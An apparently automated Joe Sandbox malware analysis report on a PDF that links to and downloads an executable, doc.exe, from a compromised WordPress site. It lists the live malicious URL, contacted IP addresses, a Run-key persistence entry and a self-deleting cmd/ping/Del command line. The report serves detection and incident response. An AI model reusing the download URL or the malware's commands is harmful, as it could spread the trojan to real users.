Analysis Report

Overview

General Information

Joe Sandbox Version:	20.0.0
Analysis ID:	491829
Start time:	21:31:26
Joe Sandbox Product:	Cloud
Start date:	03.02.2018
Overall analysis duration:	0h 7m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	aaa.pdf
Cookbook file name:	defaultwindowspdfcookbook.jbs
Analysis system description:	Windows 10 (Java 1.8.0_91, Flash 21.0.0.242, Acrobat Reader DC 2015.016.20039, Internet Explorer 11, Chrome 51, Firefox 47)
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Detection:	MAL
Classification:	mal88.evad.expl.spyw.troj.winPDF@22/41@5/4
HCA Information:	Successful, ratio: 100% Number of executed functions: 24 Number of non-executed functions: 48
EGA Information:	Failed
HDC Information:	Failed
Cookbook Comments:	Adjust boot time Found application associated with file extension: .pdf Found PDF document Simulate clicks Security Warning found Click Allow Close Viewer URL browsing timeout
Warnings:	Show All Exclude process from analysis (whitelisted): WmiPrvSE.exe, rundll32.exe, WmiApSrv.exe Execution Graph export aborted for target RdrCEF.exe, PID 3644 because it is empty Execution Graph export aborted for target iexplore.exe, PID 876 because there are no executed function Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtEnumerateValueKey calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadFile calls found. Report size getting too big, too many NtSetInformationFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: doc.exe, doc.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	88	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for submitted file

Show sources

Source: aaa.pdf

virustotal: Detection: 8%

Perma Link

Software Vulnerabilities:

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: zwangerschapsyogaamsterdamwest.nl

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.72:49751 -> 192.185.103.35:80

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.72:49751 -> 192.185.103.35:80

Browser exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe

Networking:

Downloads files from webservers via HTTP

Show sources

Source: global traffic

HTTP traffic detected: GET /wp-user/doc.exe HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: zwangerschapsyogaamsterdamwest.nlConnection: Keep-Alive

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: zwangerschapsyogaamsterdamwest.nl

Urls found in memory or binary data

Show sources

Source: iexplore.exe	String found in binary or memory: file:///C:/Users/user/AppData/Local/Microsoft/Windows/INetCache/IE/W8M6OQAW/doc
Source: AcroRd32.exe	String found in binary or memory: http://
Source: AcroRd32.exe	String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: iexplore.exe	String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl
Source: AcroRd32.exe	String found in binary or memory: http://n
Source: iexplore.exe	String found in binary or memory: http://ocsp.digicert.com
Source: AcroRd32.exe	String found in binary or memory: http://ocsp.thawte.com0
Source: AcroRd32.exe	String found in binary or memory: http://s.symcb.com/pca3-g5.crl0
Source: AcroRd32.exe	String found in binary or memory: http://s.symcd.com0_
Source: AcroRd32.exe	String found in binary or memory: http://sw.symcb.com/sw.crl0
Source: AcroRd32.exe	String found in binary or memory: http://sw.symcd.com0
Source: AcroRd32.exe	String found in binary or memory: http://sw1.symcb.com/sw.crt0
Source: AcroRd32.exe	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: AcroRd32.exe	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: AcroRd32.exe	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: AcroRd32.exe	String found in binary or memory: http://www.adobe.c
Source: AcroRd32.exe	String found in binary or memory: http://www.osmf.org/default/1.0%http://www.osmf.org/mediatype/default
Source: AcroRd32.exe	String found in binary or memory: http://www.osmf.org/drm/default
Source: AcroRd32.exe	String found in binary or memory: http://www.osmf.org/elementId%http://www.osmf.org/temporal/embedded$http://www.osmf.org/temporal/dyn
Source: AcroRd32.exe	String found in binary or memory: http://www.osmf.org/layout/anchor
Source: AcroRd32.exe	String found in binary or memory: http://www.osmf.org/layout/padding%http://www.osmf.org/layout/attributes
Source: AcroRd32.exe	String found in binary or memory: http://www.osmf.org/region/target#http://www.osmf.org/layout/renderer#http://www.osmf.org/layout/abs
Source: AcroRd32.exe	String found in binary or memory: http://www.osmf.org/subclip/1.0
Source: AcroRd32.exe	String found in binary or memory: http://www.quicktime.com.Acrobat
Source: iexplore.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc
Source: iexplore.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe)
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe9
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe?
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeC:
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeT8
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeWesternY
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe_
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exedv
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exeeDNS
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exei
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exel
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exel(9
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exell9
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exet
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exex93$
Source: AcroRd32.exe	String found in binary or memory: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exey
Source: AcroRd32.exe	String found in binary or memory: https://
Source: AcroRd32.exe	String found in binary or memory: https://d.symcb.com/cps0%
Source: AcroRd32.exe	String found in binary or memory: https://d.symcb.com/rpa0
Source: AcroRd32.exe	String found in binary or memory: https://d.symcb.com/rpa0)
Source: AcroRd32.exe	String found in binary or memory: https://ims-na1.adobelogin.com
Source: iexplore.exe	String found in binary or memory: https://login.live.com
Source: iexplore.exe	String found in binary or memory: https://login.live.com/

Downloads executable code via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.12.2Date: Sat, 03 Feb 2018 20:33:25 GMTContent-Type: application/x-msdownloadContent-Length: 345600Connection: keep-aliveLast-Modified: Thu, 01 Feb 2018 12:35:29 GMTAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 68 3a 72 5a 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 08 00 00 3e 05 00 00 06 00 00 00 00 00 00 be 5d 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 5d 05 00 4b

Detected TCP or UDP traffic on non-standard ports

Show sources

Source: global traffic

TCP traffic: 192.168.1.72:49756 -> 213.183.58.7:1337

Uses ping.exe to check the status of other devices and networks

Show sources

Source: unknown

Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2022239 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.1.72:49751 -> 192.185.103.35:80
Source: Traffic	Snort IDS: 2021697 ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious 192.168.1.72:49751 -> 192.185.103.35:80

Boot Survival:

Creates an autostart registry key

Show sources

Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run flurant
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Registry value created or modified: HKEY_USERS\Software\Microsoft\Windows\CurrentVersion\Run flurant

Stealing of Sensitive Information:

Uploads sensitive system information to the internet (privacy leak)

Show sources

Source: 192.168.1.72:49751 -> 192.185.103.35:80

HTTP traffic detected: Header contains sensitive information user (username): GET /wp-user/doc.exe HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: zwangerschapsyogaamsterdamwest.nlConnection: Keep-Alive

Spreading:

Enumerates the file system

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	File opened: C:\Users\user\AppData\Local\Microsoft\

System Summary:

Found GUI installer (many successful clicks)

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe	Automated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exe	Automated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exe	Automated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exe	Automated click: Run
Source: C:\Program Files\Internet Explorer\iexplore.exe	Automated click: Run

Uses Rich Edit Controls

Show sources

Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File opened: C:\Windows\SYSTEM32\Msftedit.dll

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses Microsoft Silverlight

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe

File opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

File opened: C:\Program Files\Java\jre1.8.0_91\bin\msvcr100.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: ProgID = s 'AcroExch.PDBookmark.1' source: AcroRd32.exe
Source:	Binary string: VersionIndependentProgID = s 'AcroExch.PDBookmark' source: AcroRd32.exe
Source:	Binary string: AcroExch.PDBookmark.1 = s 'AcroExch.PDBookmark' source: AcroRd32.exe
Source:	Binary string: AcroExch.PDBookmark = s 'AcroExch.PDBookmark' source: AcroRd32.exe
Source:	Binary string: CurVer = s 'AcroExch.PDBookmark.1' source: AcroRd32.exe
Source:	Binary string: ForceRemove {2EAF0840-690A-101B-9CA8-9240CE2738AE} = s 'AcroExch.PDBookmark' source: AcroRd32.exe

PDF has a JavaScript or JS counter value indicative for goodware

Show sources

Source: aaa.pdf	Initial sample: PDF keyword /JS count = 0
Source: aaa.pdf	Initial sample: PDF keyword /JavaScript count = 0

PDF has an EmbeddedFile counter value indicative for goodware

Show sources

Source: aaa.pdf

Initial sample: PDF keyword /EmbeddedFile count = 0

Classification label

Show sources

Source: classification engine

Classification label: mal88.evad.expl.spyw.troj.winPDF@22/41@5/4

Clickable URLs found in PDF

Show sources

Source: aaa.pdf

Initial sample: http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe

Creates files inside the user directory

Show sources

Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ReaderMessages-journal

Creates temporary files

Show sources

Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File created: C:\Users\user\AppData\Local\Temp\acrord32_sbx\A9Rtpgc30_1jawsca_2cc.tmp

Parts of this applications are using the .NET runtime (Probably coded in C#)

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\08391ef300403b9fead968af65ee6853\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\08391ef300403b9fead968af65ee6853\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Reads ini files

Show sources

Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

File read: C:\Program Files\desktop.ini

Reads software policies

Show sources

Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Sample is known by Antivirus (Virustotal or Metascan)

Show sources

Source: aaa.pdf

Virustotal: hash found

Spawns processes

Show sources

Source: unknown	Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' 'C:\Users\user\Desktop\aaa.pdf'
Source: unknown	Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\aaa.pdf'
Source: unknown	Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16448250
Source: unknown	Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.0.1828675925\933854480' --allow-no-sandbox-job --font-cache-shared-handle=1260 /prefetch:673131151
Source: unknown	Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.1.1650676039\414440677' --allow-no-sandbox-job --font-cache-shared-handle=1756 /prefetch:673131151
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Source: unknown	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:920 CREDAT:82945 /prefetch:2
Source: unknown	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\doc\doc.exe 'C:\Users\user\AppData\Local\Temp\doc\doc.exe'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0x4
Source: unknown	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe' --type=renderer /prefetch:1 'C:\Users\user\Desktop\aaa.pdf'
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --backgroundcolor=16448250
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' http://zwangerschapsyogaamsterdamwest.nl/wp-user/doc.exe
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.0.1828675925\933854480' --allow-no-sandbox-job --font-cache-shared-handle=1260 /prefetch:673131151
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Process created: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe 'C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe' --type=renderer --disable-3d-apis --disable-databases --disable-direct-npapi-requests --disable-file-system --disable-notifications --disable-shared-workers --lang=en-US --lang=en-US --log-severity=disable --product-version='ReaderServices/15.16.20039 Chrome/45.0.2454.85' --enable-pinch --device-scale-factor=1 --enable-delegated-renderer --num-raster-threads=2 --gpu-rasterization-msaa-sample-count=8 --content-image-texture-target=3553 --video-image-texture-target=3553 --disable-accelerated-video-decode --disable-webrtc-hw-encoding --disable-gpu-compositing --channel='3632.1.1650676039\414440677' --allow-no-sandbox-job --font-cache-shared-handle=1756 /prefetch:673131151
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Program Files\Internet Explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' SCODEF:920 CREDAT:82945 /prefetch:2
Source: C:\Program Files\Internet Explorer\iexplore.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process created: C:\Users\user\AppData\Local\Temp\doc\doc.exe 'C:\Users\user\AppData\Local\Temp\doc\doc.exe'
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping 1.1.1.1 -n 1 -w 1000 > Nul & Del 'C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\LGS3HANG\doc.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 1.1.1.1 -n 1 -w 1000

Uses an in-process (OLE) Automation server

Show sources

Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{56FDF344-FD6D-11d0-958A-006097C9A090}\InProcServer32

Writes ini files

Show sources

Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe

File written: C:\Windows\assembly\Desktop.ini

Creates files inside the system directory

Show sources

Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe

File created: C:\Windows\assembly\Desktop.ini

Creates mutexes

Show sources

Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Mutant created: \Sessions\1\BaseNamedObjects\27debcab-f106-478b-9b30-c709f1afc06a
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\CLR_PerfMon_WrapMutex
Source: C:\Users\user\AppData\Local\Temp\doc\doc.exe	Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Detected potential crypto function

Show sources

Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10EC62	5_2_3C10EC62
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10D307	5_2_3C10D307
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C113DF2	5_2_3C113DF2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10C527	5_2_3C10C527
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10DA27	5_2_3C10DA27
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10E127	5_2_3C10E127
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C115F11	5_2_3C115F11
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C115BE7	5_2_3C115BE7
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10D63B	5_2_3C10D63B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10E44D	5_2_3C10E44D
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C119FB2	5_2_3C119FB2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C11B27D	5_2_3C11B27D
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C116B46	5_2_3C116B46
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C111EE6	5_2_3C111EE6
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10B047	5_2_3C10B047
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C113082	5_2_3C113082
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C1192A7	5_2_3C1192A7
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10E9E6	5_2_3C10E9E6
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C11B98D	5_2_3C11B98D
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C119C86	5_2_3C119C86
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C112158	5_2_3C112158
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C119525	5_2_3C119525
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10B379	5_2_3C10B379
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10AB8B	5_2_3C10AB8B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C142C60	5_2_3C142C60
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C10C84B	5_2_3C10C84B
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C113AC6	5_2_3C113AC6
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C1154C5	5_2_3C1154C5
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C116DC2	5_2_3C116DC2
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C1157FB	5_2_3C1157FB
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C1132FB	5_2_3C1132FB
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C11B007	5_2_3C11B007
Source: C:\Program Files\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe	Code function: 5_2_3C1105F2	5_2_3C1105F2
